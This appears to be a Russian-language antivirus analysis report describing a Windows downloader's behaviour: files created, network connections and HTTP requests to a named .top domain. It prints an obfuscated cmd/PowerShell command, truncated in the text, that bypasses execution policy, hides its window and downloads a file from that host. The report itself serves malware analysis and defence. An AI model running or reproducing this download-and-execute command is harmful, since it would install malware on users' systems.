Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "PoWERSHe^lL.E^xE ^-e^XEcu^tIoNpo^l^icY^ ^b^yp^Ass ^-NoPr^of^ile ^-winD^o^ws^tYlE H^i^dden ^(New^-^oB^jEcT^ ^S^YST^e^m.ne^T^.^W^e^b^cl^i^eN^T).^DowN^lO^adFi^lE(^'http://aloepol...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'al###olera.top':80
TCP
Запросы HTTP GET
- http://al###olera.top/read.php?f=#####
UDP
- DNS ASK al###olera.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "PoWERSHe^lL.E^xE ^-e^XEcu^tIoNpo^l^icY^ ^b^yp^Ass ^-NoPr^of^ile ^-winD^o^ws^tYlE H^i^dden ^(New^-^oB^jEcT^ ^S^YST^e^m.ne^T^.^W^e^b^cl^i^eN^T).^DowN^lO^adFi^lE(^'http://aloepol...' (со скрытым окном)
